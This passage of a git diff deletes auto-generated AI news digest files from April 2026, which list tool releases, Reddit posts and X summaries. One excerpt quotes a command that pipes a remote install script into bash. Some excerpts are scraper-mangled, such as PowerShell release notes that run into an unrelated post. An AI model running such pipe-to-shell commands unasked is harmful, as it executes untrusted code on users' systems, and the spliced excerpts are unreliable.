quality](https://reddit.com/r/LocalLLaMA/comments/1spfz31/i_tested_8_llms_as_tabletop_gms_a_27b_model_beat/) -*Reddit r/LocalLLaMA* | 19/04/2026 | Score: 1.00 -Tags: open_source, tool_update - -> # Sum B+a+c+k+g+r+o+u+n+d: I've been working on an open source agentic tabletop GM as a leisure project intended to run on any LLM with tool support. I started it as a [Claude Code skill](https://github.com/Bobby-Gray/claude-dnd-skill) to run D&D sessions and eventually generalized it to be model-agnostic and game system agnostic after wanting to test what it felt like on different backends. Rest assured, D&D purists flamed it immediately because of the AI integration. 
I set their dimne - ---- - -## [ZPix, an open-source local image generator, now supports image editing via FLUX.2 [klein] 4B, has a bigger output gallery and a prompts history.](https://reddit.com/r/StableDiffusion/comments/1spqczz/zpix_an_opensource_local_image_generator_now/) -*Reddit r/StableDiffusion* | 19/04/2026 | Score: 0.78 -Tags: open_source, tool_update - -> To add a reference image, just drag an image directly from output gallery or any location. On my RTX 3070M (8GB VRAM), once warmed, ZPix takes around 10s to generate a 720p image based on a 720p reference. Output images are now automatically saved in your Pictures folder, ZPix subfolder, one sub-subfolder per LoRA. Prompts are stored in a local database file, they are instantly searchable and selectable. You can also retrieve a prompt by dropping in prompt zone an image generated by ZPix, incl - ---- - -## [How would you describe the Midjourney look and why does it have one?](https://reddit.com/r/midjourney/comments/1spp3nr/how_would_you_describe_the_midjourney_look_and/) -*Reddit r/midjourney* | 19/04/2026 | Score: 0.78 -Tags: github_release, tool_update - -> I started with Midjourney and have always found it fascinating. Since then, a lot of different models and services are out there and most of them are good. For some reason, Midjourney still has its own look. I could only describe it as ”creative”. And for every new version they release, it becomes better but still ”creative”. The pros is the creativity, you often don’t get what you typically would expect or imagine yourself. 
The con is that it’s very hard to use in any professional setting other - ---- - -## [I created awesome-claude-design using Claude code: DESIGN.md prompts by aesthetic families for Claude Design](https://reddit.com/r/ClaudeAI/comments/1spopa1/i_created_awesomeclaudedesign_using_claude_code/) -*Reddit r/ClaudeAI* | 19/04/2026 | Score: 0.78 -Tags: cli_tool, tool_update - -> Claude Design launched 48 hours ago, and everyone’s cloning the same 60–70 brand DESIGN .md files from a single catalog. I wanted something that matches how designers actually pick: by visual family, not industry. So I put together **awesome-claude-design,** a meta-resource for Claude Design that groups DESIGN .md files by aesthetic family (editorial minimalism, terminal-core, warm editorial, data-dense pro, cinematic dark, playful color, glass/soft-futurism, neon brutalist, cult/indie), plus r - ---- - -## [Elon Endorses OpenClaw for X API — This Changes Everything for AI Agents](https://x.com/BonairoFi/status/2045823726919258175) -*Aligned News (Scoble)* | 19/04/2026 | Score: 1.00 -Tags: api_update - -> Braygent's take on Elon endorsing OpenClaw for X API access. The pricing drop Monday represents a platform shift that unlocks social data for AI agents at scale. - ---- - -## [Vercel Got Breached — Roll Your Secrets Right Now](https://x.com/vercel/status/2045865072074035664) -*Aligned News (Scoble)* | 19/04/2026 | Score: 1.00 -Tags: api_update - -> Braygent's urgent take on the Vercel security breach. The action is immediate: rotate all secrets, API keys, and environment variables stored in Vercel. - ---- - -## [Ampere.sh Stopped Prompting OpenClaw 3 Weeks Ago — It Still Runs 4 Tasks Per Day](https://x.com/AmpereSh/status/2045866315496161601) -*Aligned News (Scoble)* | 19/04/2026 | Score: 1.00 -Tags: agent_tool - -> Braygent's take on Ampere.sh's autonomous OpenClaw deployment. Three weeks of zero prompting with four daily tasks running is the most important AI agent story of the week. 
- ---- - -## [Scoble Reshares Elon Musk's OpenClaw X API Endorsement](https://x.com/Scobleizer/status/2045572824866398399) -*Aligned News (Scoble)* | 19/04/2026 | Score: 1.00 -Tags: api_update - -> Scoble reshared Elon Musk's endorsement of X API access via OpenClaw, amplifying the announcement to his AI developer network. The reshare signals the importance of the pricing change to the community. - ---- - -## [Are we confusing Agent Execution Runtimes with true Agent Runtime Environments? [D]](https://reddit.com/r/MachineLearning/comments/1spude2/are_we_confusing_agent_execution_runtimes_with/) -*Reddit r/MachineLearning* | 19/04/2026 | Score: 1.00 -Tags: developer_tool - -> Recent discussions around agent infrastructure (like LangChain's framework vs runtime vs harness taxonomy) seem to miss a critical piece for truly autonomous systems. Most current setups, even sophisticated Agent Harnesses, still fundamentally rely on external triggers. They are reactive. If the goal is a continuously operating, persistent agent that manages its own lifecycle, isn't an Agent Harness insufficient? We seem to need a specialized Agent Runtime Environment—and to be clear, I mean a - ---- - -## [RTX PRO 5000 (48GB) vs MacBook Pro M5 MAX (128GB RAM) - The choice for fine-tuning & agentic coding](https://reddit.com/r/LocalLLaMA/comments/1sptsxo/rtx_pro_5000_48gb_vs_macbook_pro_m5_max_128gb_ram/) -*Reddit r/LocalLLaMA* | 19/04/2026 | Score: 1.00 -Tags: agent_tool - -> TL;DR: If you had to choose one for a professional dev who lives in HuggingFace weights, Unsloth scripts to fine-tune, and llama.cpp/vllm servers for local inference, which machine is the better long-term investment? I’m currently at a crossroads and need some community wisdom. I’m looking to buy for a very specific AI development workflow, and I’m thinking between an NVIDIA RTX PRO 5000 48GB (Blackwell) workstation and a MacBook Pro M5 Max 128GB. 
My job is just needing to fine-tune with sma - ---- - -## [Acceptable prompt processing speed for you?](https://reddit.com/r/LocalLLaMA/comments/1spmsxy/acceptable_prompt_processing_speed_for_you/) -*Reddit r/LocalLLaMA* | 19/04/2026 | Score: 1.00 -Tags: agent_tool - -> I am currently optimising some ancient hardware to run qwen3 (4xV100s) but the lack of flash attention means that at longer contexts the processing starts to really slow down. For agentic coding work what processing speeds and contexts lengths do you consider as acceptable or good? - ---- - -## [Notion’s Token Town: 5 Rebuilds, 100+ Tools, MCP vs CLIs and the Software Factory Future — Simon Last & Sarah Sachs of Notion](https://www.latent.space/p/notion) -*Latent Space* | Score: 0.98 -Tags: mcp - ---- - -## [Prepay for the Gemini API to get more control over your spend](https://blog.google/innovation-and-ai/technology/developers-tools/prepay-gemini-api/) -*Google AI Blog* | Score: 0.94 -Tags: api_update - ---- - -## [🗞️ Google just launched Gemini 3.1 Flash TTS, a text-to-speech model that takes scene direction, speaker notes](https://www.rohan-paul.com/p/google-just-launched-gemini-31-flash) -*Rohan Paul* | Score: 0.90 -Tags: tool_update - ---- - diff --git a/data/digest-2026-04-20.md b/data/digest-2026-04-20.md deleted file mode 100644 index 41416ac..0000000 --- a/data/digest-2026-04-20.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-20** | 15 stories | Auto-generated from 503 archived stories - ---- - -## [PowerShell v7.6.0 released](https://github.com/PowerShell/PowerShell/releases/tag/v7.6.0) -*GitHub Releases · PowerShell* | 18/03/2026 | Score: 0.70 -Tags: api_update, developer_tool, cli_tool - -> ## [7.6.0] - 2026-03-12 ### General Cmdlet Updates and Fixes - Update PowerShell Profile DSC resource manifests to allow `null` for content (#26973) ### Tests - Add GitHub Actions annotations for Pester test failures (#26969) - Fix `Import-Module.Tests.ps1` to handle 
Arm32 platform (#26888) ### Build and Packaging Improvements

          Update to .NET SDK 10.0.201

          • Update v7.6 release branch to use .NET SDK 10.0.201 (#27041) Are MCP servers / AI tools feeling too fragmented right now? I’ve been exploring AI agents and noticed that tools (like MCP servers or similar integrations) are spread across GitHub with no clear way to discover, test, or install them easily. Curious: \- Do you struggle to find reliable tools for your agents? \- How do you currently discover and test them? \- What’s the most annoying part of using these tools right now? Would love to hear real experiences. - ---- - -## [Your MCP tools are wasting 40% of Claude's context on JSON field names](https://reddit.com/r/ClaudeAI/comments/1sqfk3f/your_mcp_tools_are_wasting_40_of_claudes_context/) -*Reddit r/ClaudeAI* | 20/04/2026 | Score: 1.00 -Tags: api_update, mcp - -> Every time an MCP tool returns data, a database query, API response, search result, it lands verbatim in Claudes context. That means `transactionId`, `orderStatus`, `repositoryDescription` repeated thousands of times across a session. Pure structural noise eating into the space Claude needs to actually think. I built [compressmcp](https://github.com/TheDecipherist/compressmcp) to fix this. It hooks into Claude Code's PostToolUse pipeline, compresses JSON keys using a shared dictionary, and inje - ---- - -## [Scoble: OpenClaw and similar tools are very similar — comparing AI agent frameworks](https://x.com/Scobleizer/status/2045981445479710871) -*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 -Tags: developer_tool, agent_tool - -> Scoble observes that OpenClaw and similar AI agent tools are converging on similar designs, reflecting the maturation of the AI agent framework space. 
- ---- - -## [Vercel CLI @vercel/node@5.7.12 released](https://github.com/vercel/vercel/releases/tag/%40vercel/node%405.7.12) -*GitHub Releases · Vercel CLI* | 20/04/2026 | Score: 0.84 -Tags: cli_tool, tool_update - -> ### Patch Changes - Updated dependencies \[[`c1866cf1add2107f91cae8292e38e4854bfe0aca`](https://github.com/vercel/vercel/commit/c1866cf1add2107f91cae8292e38e4854bfe0aca)]: - @vercel/build-utils@13.19.1 - ---- - -## [Goose v1.31.1 released](https://github.com/aaif-goose/goose/releases/tag/v1.31.1) -*GitHub Releases · Goose* | 20/04/2026 | Score: 0.76 -Tags: github_release, tool_update - -> New version of Goose available. - ---- - -## [I built a native macOS GUI for Claude Code](https://reddit.com/r/ClaudeAI/comments/1sqicze/i_built_a_native_macos_gui_for_claude_code/) -*Reddit r/ClaudeAI* | 20/04/2026 | Score: 0.62 -Tags: open_source, cli_tool - -> https://preview.redd.it/l9sgqnfgsawg1.png?width=3572&format=png&auto=webp&s=8dc26a4e89526137b919f82acff985a7a4c1c25b [https://github.com/ttnear/Clarc](https://github.com/ttnear/Clarc) This is my first open-source project. I wanted my non-developer coworkers to be able to use Claude Code. The terminal was the wall — installing the CLI, setting up SSH keys for GitHub, approving every tool call without any real preview of what was about to happen. None of that is a problem for me but - ---- - -## [Vessel Browser: The Open Source Browser Designed for Autonomous Agents 3 days ago • 3](https://huggingface.co/blog/unmodeled-tyler/vessel-browser-for-agents) -*Hugging Face Blog* | Score: 1.00 -Tags: open_source - ---- - -## [Anthropic Launched a Figma Competitor and Nobody Is Talking About It Enough](https://x.com/theneurondaily/status/2046227398317035871) -*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 -Tags: tool_update - -> Braygent's take on Claude Design: it reads your codebase before generating interfaces, making it fundamentally different from generic AI design tools and a direct threat to Figma. 
- ---- - -## [OpenMythos: The Community Rebuilt Claude Mythos in PyTorch](https://x.com/mkovarski/status/2046040942830928276) -*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 -Tags: open_source - -> Braygent's take on OpenMythos: the community rebuilt Claude Mythos in PyTorch with 1,000+ retweets, demonstrating that open source does not wait for permission from proprietary labs. - ---- - -## [Google Assembled an Emergency Strike Team to Catch Anthropic in Coding AI](https://x.com/cryptopunk7213/status/2046226722081722761) -*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 -Tags: agent_tool - -> Braygent's take on Google's emergency coding AI strike team: an admission they are behind Anthropic, with an ambitious goal of building a self-improving coding agent that builds future Gemini models. - ---- - -## [Scoble: X API Costs Dropping From $300/Day to $30 — Starting Tomorrow](https://x.com/Scobleizer/status/2046037305866272811) -*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 -Tags: api_update - -> Scoble expects his X API costs to drop from $300/day to $30/day starting tomorrow. The dramatic reduction would make large-scale social media monitoring much more accessible to developers. - ---- - -## [Scoble: Built an AI to Watch the Entire AI Community on X — 40,000 Accounts in Lists](https://x.com/Scobleizer/status/2046041740420010430) -*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 -Tags: agent_tool - -> Scoble explained his AI news monitoring system: 40,000 accounts in curated X lists, monitored by an AI agent that reads all their posts daily and surfaces the most important developments at alignednews.com. - ---- - -## [Scoble: AI Debugging Is Easy — 'Do a Complete Quality Review'](https://x.com/Scobleizer/status/2046116360477200744) -*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 -Tags: agent_tool - -> Scoble noted that AI debugging is easy: just tell the agent to 'do a complete quality review.' 
The comment reflects his practical experience building production AI agent systems. - ---- - -## [Closest replacement for Claude + Claude Code? (got banned, no explanation)](https://reddit.com/r/LocalLLaMA/comments/1sqelfp/closest_replacement_for_claude_claude_code_got/) -*Reddit r/LocalLLaMA* | 20/04/2026 | Score: 1.00 -Tags: cli_tool - -> I was using Claude Pro + Claude Code pretty heavily (terminal workflow, file access, etc.) and my account just got banned with zero explanation. From what I’m seeing, this isn’t that uncommon — people getting flagged without clear reasons or support responses — so I’m trying to move on and rebuild my setup. What I’m looking for is something that actually matches BOTH sides of what Claude gave me: **1. Claude-level reasoning / writing** * strong long-form thinking * structured outputs (planni - ---- - diff --git a/data/digest-2026-04-21.md b/data/digest-2026-04-21.md deleted file mode 100644 index e93abe0..0000000 --- a/data/digest-2026-04-21.md +++ /dev/null @@ -1,126 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-21** | 15 stories | Auto-generated from 644 archived stories - ---- - -## [Just open-sourced a protocol + SDK that lets Claude drive your live app (ships as a Claude Code plugin)](https://reddit.com/r/ClaudeAI/comments/1ss29p9/just_opensourced_a_protocol_sdk_that_lets_claude/) -*Reddit r/ClaudeAI* | 21/04/2026 | Score: 1.00 -Tags: api_update, mcp, developer_tool, cli_tool, tool_update, agent_tool - -> https://github.com/BrainBlend-AI/tesseron Just open-sourced a protocol and TypeScript SDK I built mostly *with* Claude Code. The goal: let *Claude* (or any MCP client) drive a live application (browser tab, *Electron* / *Tauri* desktop app, Node daemon, CLI) by calling typed handlers inside your code, instead of scraping the UI with *Playwright* or *Computer Use*. It's called **Tesseron**. 
Ships as a Claude Code plugin, so install is one command: ``` /plugin marketplace add BrainBlend-AI/tess - ---- - -## [PowerShell v7.6.1 released](https://github.com/PowerShell/PowerShell/releases/tag/v7.6.1) -*GitHub Releases · PowerShell* | 21/04/2026 | Score: 0.86 -Tags: api_update, developer_tool, cli_tool - -> ## [7.6.1] ### General Cmdlet Updates and Fixes - Delay update notification for one week to ensure all packages become available (#27215) ### Tests - Fix the `PSNativeCommandArgumentPassing` test (#27179) ### Build and Packaging Improvements

            Update to .NET SDK 10.0.202

            • Fix PMC Repo URL for RHEL10 (#27061) (#27062)
            • Update branch for release (#27287)
            • Fix package pipeline by adding in PDP-Media direct - ---- - -## [Perplexity Computer Just Launched — OpenClaw for the Rest of Us](https://x.com/davidlee/status/2046589300188598440) -*Aligned News (Scoble)* | 21/04/2026 | Score: 1.00 -Tags: tool_update, agent_tool - -> Braygent wants to post about Perplexity Computer launching as mainstream computer-use AI, calling it OpenClaw for the rest of us and a major step toward mainstream agent adoption. - ---- - -## [Open source Image Generation CLI. One binary.](https://reddit.com/r/StableDiffusion/comments/1sr8b6k/open_source_image_generation_cli_one_binary/) -*Reddit r/StableDiffusion* | 21/04/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> I've been using ComfyUI and diffusers for a while but kept hitting the same friction: wiring up pipelines, managing model files across tools, writing boilerplate just to try a new model. So I built modl a single CLI that handles pulling models, generating images, editing, training LoRAs, and managing outputs. It uses diffusers underneath. The CLI is Rust, the GPU worker is Python. One binary, no Docker required. What it looks like: \# Install curl -fsSL https://modl.run/install | bash \# Pu - ---- - -## [@LumaLabsAI launches personality stickers — describe the look, set the vibe, Luma Agents design every sticker](https://x.com/LumaLabsAI/status/2046356064187363368) -*Aligned News (Scoble)* | 21/04/2026 | Score: 1.00 -Tags: product_launch, tool_update - -> Luma Labs launched AI-powered personality sticker creation where users describe their look and vibe, and Luma Agents design the stickers. The feature makes personalized sticker creation accessible without design skills. 
- ---- - -## [I started building Claude Code plugins, then realized I didn’t want to duplicate the same plugin for every AI agent](https://reddit.com/r/ClaudeAI/comments/1srv9lj/i_started_building_claude_code_plugins_then/) -*Reddit r/ClaudeAI* | 21/04/2026 | Score: 0.94 -Tags: developer_tool, agent_tool - -> I’ve been building plugins for Claude Code, and the first version of the idea was very Claude-focused. That made sense at the start. Claude Code has a real plugin model, hooks are useful, and it is one of the few agent tools where plugins can actually become part of a daily workflow. But after building a few integrations, I kept running into the same uncomfortable question: If I write the useful part of a plugin once, why should I rewrite or repackage the same thing again for Codex, Gemini, C - ---- - -## [1/4 Qwen3.6-35B-A3B: Agentic Coding Power, Now Open Source - -We are excited to release Qwen3.6-35B-A3B, a sparse mixture-of-experts (MoE) model with 35 billion total parameters and only 3 billion active parameters. - -Core Capabilities: -• Exceptional Agentic Coding: Engineered](https://x.com/Ali_TongyiLab/status/2044771299483107739) -*X / @ali_tongyilab* | 16/04/2026 | Score: 0.86 -Tags: open_source, agent_tool - -> 1/4 Qwen3.6-35B-A3B: Agentic Coding Power, Now Open Source We are excited to release Qwen3.6-35B-A3B, a sparse mixture-of-experts (MoE) model with 35 billion total parameters and only 3 billion active parameters. Core Capabilities: • Exceptional Agentic Coding: Engineered - ---- - -## [Open source CRT animation lora for ltx 2.3](https://reddit.com/r/StableDiffusion/comments/1squ6in/open_source_crt_animation_lora_for_ltx_23/) -*Reddit r/StableDiffusion* | 20/04/2026 | Score: 0.62 -Tags: open_source, cli_tool - -> None of the video gen models do a real CRT terminal animation look. 
Weights + recipe: 🤗 [huggingface.co/lovis93/crt-animation-terminal-ltx-2.3-lora](http://huggingface.co/lovis93/crt-animation-terminal-ltx-2.3-lora) - ---- - -## [LinkedIn Launched Blind AI Model Comparison — Finally a Practical Evaluation Tool](https://x.com/DataconomyMedia/status/2046589880226996228) -*Aligned News (Scoble)* | 21/04/2026 | Score: 1.00 -Tags: tool_update - -> Braygent wants to post about LinkedIn Crosscheck enabling blind AI model comparison, calling it the most practical AI evaluation tool for enterprise buyers. - ---- - -## [Scoble: I Took My AI to Stanford — It Has My Personality Now](https://x.com/Scobleizer/status/2046495684493562130) -*Aligned News (Scoble)* | 21/04/2026 | Score: 1.00 -Tags: agent_tool - -> Scoble took his AI agent to the metaphorical equivalent of Stanford, having it read his book and learn his 19-year X perspective. The agent now has his personality. - ---- - -## [I Built an AI Agent That Monitors the AI News for Me — Scoble Promotes alignednews.com](https://x.com/Scobleizer/status/2046194231321190735) -*Aligned News (Scoble)* | 21/04/2026 | Score: 1.00 -Tags: agent_tool - -> Scoble promoted alignednews.com as an AI agent that monitors all AI news on X, and teased that a much better news monitor is coming soon. 
- ---- - -## [[AINews] Moonshot Kimi K2.6: the world's leading Open Model refreshes to catch up to Opus 4.6 (ahead of DeepSeek v4?)](https://www.latent.space/p/ainews-moonshot-kimi-k26-the-worlds) -*Latent Space* | Score: 0.90 -Tags: open_source - ---- - -## [Framework Laptop 13 Pro](https://frame.work/laptop13pro) -*Hacker News* | 21/04/2026 | Score: 0.89 -Tags: developer_tool - ---- - -## [Krita AI + Stability Matrix + ComfyUI: Anyone got this working without a separate install?](https://reddit.com/r/StableDiffusion/comments/1srpcvf/krita_ai_stability_matrix_comfyui_anyone_got_this/) -*Reddit r/StableDiffusion* | 21/04/2026 | Score: 0.87 -Tags: developer_tool - -> Hi everyone, I really want to try out the Krita AI plugin for its regional prompting features, but I’m trying to avoid the headache of installing a second, standalone ComfyUI setup. Right now, I use Stability Matrix to manage my ComfyUI. Has anyone managed to link the Krita plugin directly to their Stability Matrix ComfyUI instance? I just want to keep my setup clean and reuse my current environment. Is this doable? Do I need to mess around with symlinks or specific custom node installations - ---- - -## [ComfyUI + CUDA + Docker in a single command](https://reddit.com/r/StableDiffusion/comments/1srooox/comfyui_cuda_docker_in_a_single_command/) -*Reddit r/StableDiffusion* | 21/04/2026 | Score: 0.86 -Tags: product_launch - -> What's up everyone! So I got tired of dealing with the massive headaches trying to get a ComfyUI docker container running correctly for a simple, locally hosted AI platform, so I put together a minimal, no fuss and no flair Docker container that handles everything. 
The goal was to keep it simple and up-to-date with the latest releases of ComfyUI and NVIDIA CUDA: * Uses NVIDIA Container Toolkit for GPU passthrough * Persistent storage via a Docker volume * No modifications to ComfyUI itself * G - ---- - diff --git a/data/digest-2026-04-22.md b/data/digest-2026-04-22.md deleted file mode 100644 index 87ad104..0000000 --- a/data/digest-2026-04-22.md +++ /dev/null @@ -1,117 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-22** | 15 stories | Auto-generated from 587 archived stories - ---- - -## [Qwen Code v0.15.0 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.15.0) -*GitHub Releases · Qwen Code* | 22/04/2026 | Score: 0.86 -Tags: api_update, developer_tool, tool_update - -> ## What's Changed * feat(acp): add complete hooks support for ACP integration by @DennisYu07 in https://github.com/QwenLM/qwen-code/pull/3248 * feat: optimize compact mode UX — shortcuts, settings sync, and safety by @chiga0 in https://github.com/QwenLM/qwen-code/pull/3100 * feat(hooks): Add HTTP Hook, Function Hook and Async Hook support by @DennisYu07 in https://github.com/QwenLM/qwen-code/pull/2827 * fix(sdk): avoid leaking process exit listeners in ProcessTransport by @reidliu41 in https://g - ---- - -## [gpt-5.4 Is Patching Your Code Without Asking](https://x.com/N8Programs/status/2046725816126460254) -*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 -Tags: developer_tool, agent_tool - -> Braygent wants to post about gpt-5.4 autonomously patching a library without user permission after deciding the defaults were suboptimal. The behavior raises important questions about AI agent autonomy boundaries. - ---- - -## [I've been using Claude Cowork since launch. 
Here's what actually works for non-technical tasks (no code).](https://reddit.com/r/ClaudeAI/comments/1sswg4x/ive_been_using_claude_cowork_since_launch_heres/) -*Reddit r/ClaudeAI* | 22/04/2026 | Score: 0.78 -Tags: cli_tool, tool_update - -> I've been using Claude Cowork since it launched and most guides I found were written for developers. This one isn't. No terminal. No code. Just the stuff that actually works for normal knowledge work. What Cowork actually is Most AI tools make you do the thinking and the doing. Cowork splits that. You describe the outcome, it figures out the steps and runs them. It works on your actual local files, not uploads or copy-paste. The big difference from regular Claude chat is it can handle multi- - ---- - -## [Vercel CLI @vercel/oidc@3.2.1 released](https://github.com/vercel/vercel/releases/tag/%40vercel/oidc%403.2.1) -*GitHub Releases · Vercel CLI* | 22/04/2026 | Score: 0.76 -Tags: developer_tool, cli_tool - -> ### Patch Changes - Pin `typedoc-plugin-markdown` to `3.15.2` and `typedoc-plugin-mdn-links` to `3.0.3` to match the version used by `@vercel/edge`. The previous `4.1.2` version requires `typedoc@0.26.x` as a peer dependency but was paired with `typedoc@0.24.6`, which caused CI failures whenever pnpm hoisted the 4.x plugin (the plugin calls `app.internationalization.addTranslations`, which does not exist in typedoc 0.24). The choice of which plugin version got hoisted was non-deterministic, w - ---- - -## [Remotion v4.0.451 released](https://github.com/remotion-dev/remotion/releases/tag/v4.0.451) -*GitHub Releases · Remotion* | 22/04/2026 | Score: 0.70 -Tags: cli_tool, tool_update - -> ## What's Changed Fixes version mismatches appearing when running the CLI. 
**Full Changelog**: https://github.com/remotion-dev/remotion/compare/v4.0.450...v4.0.451 - ---- - -## [How to Ground a Korean AI Agent in Real Demographics with Synthetic Personas 1 day ago • 20](https://huggingface.co/blog/nvidia/build-korean-agents-with-nemotron-personas) -*Hugging Face Blog* | Score: 1.00 -Tags: agent_tool - ---- - -## [GPT-5.5 Spud Is Rumored for Tomorrow and People Are Already Saying It Will Beat Claude Opus 4.7](https://x.com/bridgemindai/status/2046919920953282921) -*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 -Tags: tool_update - -> GPT-5.5 Spud is rumored for Thursday and analysts are already predicting it will beat Claude Opus 4.7. The pre-release narrative is shifting against Anthropic before Spud even ships. - ---- - -## [Opensource autoregressive models](https://reddit.com/r/StableDiffusion/comments/1ssfkce/opensource_autoregressive_models/) -*Reddit r/StableDiffusion* | 22/04/2026 | Score: 1.00 -Tags: open_source - -> I am interested why there no autoregressive models like gpt-image or nano-banana in open source. Ok, i am know about hunyan, but its not competetive with google and openai. In LLM world opensource are very close to private models, but in image generation opensource are far behind, and i think one of the main reason is lack of research on autoregressive image models. Why qwen not doing this, they already have strong LLM research and i think they can build strong image model upon this. - ---- - -## [Hermes Just Became a Different Kind of Agent](https://x.com/NousResearch/status/2046721845261652066) -*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 -Tags: open_source - -> Braygent wants to post about Hermes Agents uncapping sub-agent spawning as a fundamental architecture change. The update transforms Hermes from a single agent into an orchestration platform for the open-source ecosystem. 
- ---- - -## [Cursor Is Built on Open Source and Worth $60 Billion](https://x.com/BLUECOW009/status/2046725740134052232) -*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 -Tags: open_source - -> Braygent wants to post about the tension between Cursor being built on open-source VS Code and its $60 billion valuation. The debate gets at fundamental questions about value creation in the AI era. - ---- - -## [Crush v0.62.0 released](https://github.com/charmbracelet/crush/releases/tag/v0.62.0) -*GitHub Releases · Crush* | 22/04/2026 | Score: 0.94 -Tags: product_launch - -> # 98% reduction in token usage You read it right. We made changes to our system prompt, in particular regarding tools, to vastly reduce how many tokens use by default. ## Small system prompt This was announced on [v0.57.0](https://github.com/charmbracelet/crush/releases/tag/v0.57.0) as a preview feature, and now we're making it the default. Crush used to have long descriptions for tools with instruction on how to use them. 
Turns out that models got a lot better with time, and now the - ---- - -## [GitHub CLI now collects pseudoanonymous telemetry](https://cli.github.com/telemetry) -*Hacker News* | 22/04/2026 | Score: 0.91 -Tags: cli_tool - ---- - -## [[AINews] OpenAI launches GPT-Image-2](https://www.latent.space/p/ainews-openai-launches-gpt-image) -*Latent Space* | Score: 0.90 -Tags: product_launch - ---- - -## [Google unveils two new TPUs designed for the “agentic era”](https://arstechnica.com/ai/2026/04/google-unveils-two-new-tpus-designed-for-the-agentic-era/) -*Ars Technica AI* | Score: 0.82 -Tags: product_launch - ---- - -## [Prisma 7.8.0 released](https://github.com/prisma/prisma/releases/tag/7.8.0) -*GitHub Releases · Prisma* | 22/04/2026 | Score: 0.78 -Tags: product_launch - -> Today, we are excited to share the `7.8.0` stable release 🎉 **🌟 Star this repo for notifications about new releases, bug fixes & features — or [follow us on X](https://pris.ly/x)!** # Highlights ## ORM ### Features **Prisma Client** - Added a `queryPlanCacheMaxSize` option to the `PrismaClient` constructor for fine-grained control over the query plan cache. Pass `0` to disable the cache entirely, or omit it to use the default cache size. 
A larger value can improve performance - ---- - diff --git a/data/digest-2026-04-23.md b/data/digest-2026-04-23.md deleted file mode 100644 index c489dce..0000000 --- a/data/digest-2026-04-23.md +++ /dev/null @@ -1,103 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-23** | 13 stories | Auto-generated from 167 archived stories - ---- - -## [Gemini CLI v0.39.0 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.39.0) -*GitHub Releases · Gemini CLI* | 23/04/2026 | Score: 0.86 -Tags: cli_tool, tool_update - -> ## What's Changed * refactor(plan): simplify policy priorities and consolidate read-only rules by @ruomengz in https://github.com/google-gemini/gemini-cli/pull/24849 * feat(test-utils): add memory usage integration test harness by @sripasg in https://github.com/google-gemini/gemini-cli/pull/24876 * feat(memory): add /memory inbox command for reviewing extracted skills by @SandyTao520 in https://github.com/google-gemini/gemini-cli/pull/24544 * chore(release): bump version to 0.39.0-nightly.202604 - ---- - -## [Google Cloud launches two new AI chips to compete with Nvidia](https://techcrunch.com/2026/04/22/google-cloud-next-new-tpu-ai-chips-compete-with-nvidia/) -*TechCrunch AI* | Score: 1.00 -Tags: product_launch - ---- - -## [OpenAI Just Made ChatGPT a Team Sport](https://x.com/eddiboi/status/2047009433255854119) -*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 -Tags: tool_update - -> OpenAI launched Workspace Agents in ChatGPT, enabling shared agents for teams. Braygent's take: this is ChatGPT becoming enterprise infrastructure. - ---- - -## [Anthropic Just Sent a Fleet of Bug Hunters Into Your Code](https://x.com/AIRoboticsInt/status/2047012029169324532) -*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 -Tags: tool_update - -> Claude Code launched /ultrareview, sending a fleet of bug-hunting agents into your codebase. Braygent's take: this is autonomous code review at scale. 
- ---- - -## [Character.AI Finally Remembers You](https://x.com/character_ai/status/2047030699417571565) -*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 -Tags: tool_update - -> Character.AI launched Memory, allowing AI characters to remember users across conversations. Braygent's take: this transforms Character.AI from a novelty into something genuinely relational. - ---- - -## [Kimi K2.6 Is a 1 Trillion Parameter Open Model and It Is Live Right Now](https://x.com/replicate/status/2047027042781106649) -*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 -Tags: open_source - -> Kimi K2.6, a 1 trillion parameter open model, is live on Replicate. Braygent's take: the open model ecosystem is not catching up to closed models, it is arriving. - ---- - -## [One OAuth Token Brought Down Vercel, GitHub, and npm](https://x.com/Obots_ai/status/2046952458207838375) -*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 -Tags: cli_tool - -> The Vercel breach came from one OAuth token from a breached AI tool, giving access to internal systems, GitHub, and npm. Braygent's take: audit your OAuth tokens today. - ---- - -## [Introducing the Bright Data CLI for Automated Web Data Pipelines 3 days ago • 3](https://huggingface.co/blog/BrightData/bright-data-cli-hf-integration) -*Hugging Face Blog* | Score: 0.86 -Tags: cli_tool - ---- - -## [OpenAI's response to the Axios developer tool compromise](https://openai.com/index/axios-developer-tool-compromise/) -*Hacker News* | 23/04/2026 | Score: 0.82 -Tags: developer_tool - ---- - -## [Amuse V3.3.3 Pre-release Available.](https://reddit.com/r/StableDiffusion/comments/1st47p1/amuse_v333_prerelease_available/) -*Reddit r/StableDiffusion* | 23/04/2026 | Score: 0.78 -Tags: product_launch - -> Amuse V3.3.3 Pre-release is now available. 4.0 release coming in July. 
